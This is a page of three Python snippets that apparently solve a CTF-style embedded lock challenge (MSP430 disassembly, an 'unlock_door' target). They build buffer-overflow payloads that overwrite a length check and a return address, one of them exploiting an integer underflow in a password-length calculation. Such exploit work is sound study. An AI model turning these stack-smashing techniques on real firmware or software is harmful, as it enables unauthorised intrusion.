Ejemplo n.º 1
0
def ub():
    u = utils.mk_test_hex(0x63*2)
    ub = bytearray(unhexlify(u))
    #this ends up overwriting the value used to check min length of password
    #we set it low to ensure we pass, but non-zero to avoid ending the string
    ub[0x11] = 1
    #smash the stack!
    ub[0x2a:0x2b] = [0x4a, 0x44]
    return ub
Ejemplo n.º 2
0
def pb(ub=bytearray('')):
    '''
    Right after the "Please enter your password" prompt, it does some dodgy math to
    try to figure out the len argument to getsn for the password:

        45c8:  3e40 1f00      mov       #0x1f, r14
        45cc:  0e8b           sub       r11, r14
        45ce:  3ef0 ff01      and       #0x1ff, r14

    i.e.: 

        r11 == len(ub) == 0x20
        r14 = 0x1f
        r14 -= r11 # whoops! overflow: r14 == 0xffff
        r14 &= 0x1ff # r14 == 0x1ff
    '''
    plen = 0x1f - 0x20 & 0x1ff
    pb = bytearray(unhexlify(utils.mk_test_hex(plen*2)))
    #add the return address for unlock_door
    pb[4:6] = [0x4c, 0x44]
    #password must be zero-terminated at 0x11
    return pb
Ejemplo n.º 3
0
def ub():
    #0x20 is the max we can get away with
    u = utils.mk_test_hex(0x20*2)
    ub = bytearray(unhexlify(u))
    return ub